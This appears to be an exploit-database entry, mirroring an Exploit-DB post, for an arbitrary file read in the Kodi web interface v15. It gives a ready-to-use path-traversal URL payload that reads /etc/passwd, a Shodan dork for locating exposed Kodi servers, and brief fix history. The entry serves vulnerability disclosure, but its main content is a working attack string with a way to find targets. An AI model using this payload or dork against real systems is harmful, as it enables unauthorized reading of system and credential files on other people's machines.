header-logo
Suggest Exploit
vendor:
Kodi Web Interface
by:
mpronk89
4,3
CVSS
MEDIUM
Arbitrary File Access
22
CWE
Product Name: Kodi Web Interface
Affected Version From: v15
Affected Version To: v16
Patch Exists: YES
Related CWE: N/A
CPE: kodi.tv
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

arbitrary file access kodi web interface

Kodi web interface is vulnerable to arbitrary file read. An example of this exploit is <ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd for passwd. This issue was fixed in 2012, reintroduced in February 2015 and fixed again in November 2015 for v16.

Mitigation:

The issue was fixed in 2012, reintroduced in February 2015 and fixed again in November 2015 for v16.
Source

Exploit-DB raw data:

# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a

kodi web interface vulnerable to arbitrary file read.

example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


for passwd

​(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)

Navigation

Suggest Exploit

Services By CQR